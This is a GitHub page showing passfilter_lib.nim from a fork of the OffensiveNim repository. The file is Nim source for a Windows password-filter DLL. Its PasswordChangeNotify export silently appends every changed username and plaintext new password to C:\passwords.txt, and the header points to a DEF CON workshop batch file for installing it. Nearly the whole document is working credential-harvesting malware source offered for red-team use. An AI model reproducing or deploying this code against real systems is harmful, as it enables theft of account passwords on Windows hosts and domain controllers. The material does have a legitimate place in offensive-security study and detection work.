forked from byt3bl33d3r/OffensiveNim
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpassfilter_lib.nim
33 lines (22 loc) · 1.13 KB
/
passfilter_lib.nim
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#[
Author: Marcello Salvati, Twitter: @byt3bl33d3r
License: BSD 3-Clause
Install with the passfilter.bat file here https://github.com/zerosum0x0/defcon-25-workshop/blob/master/src/passfilter/passfilter.bat
Reference:
- https://github.com/zerosum0x0/defcon-25-workshop/blob/master/src/passfilter/passfilter/passfilter.c
]#
import strformat
import winim/lean
proc NimMain() {.cdecl, importc.}
proc PasswordChangeNotify(UserName: PUNICODE_STRING, RelativeId: ULONG, NewPassword: PUNICODE_STRING): NTSTATUS {.stdcall, exportc, dynlib.} =
NimMain() # Initialize Nim's GC
let f = open(r"C:\passwords.txt", fmAppend)
defer: f.close()
f.writeline(fmt"Username: {UserName.Buffer}, NewPassword: {NewPassword.Buffer}")
return 0
proc InitializeChangeNotify(): BOOL {.stdcall, exportc, dynlib.} =
return true
proc PasswordFilter(AccountName: PUNICODE_STRING, FullName: PUNICODE_STRING, Password: PUNICODE_STRING, SetOperation: BOOL): BOOL {.stdcall, exportc, dynlib.} =
return true
proc DllMain(hinstDLL: HINSTANCE, fdwReason: DWORD, lpvReserved: LPVOID) : BOOL {.stdcall, exportc, dynlib.} =
return true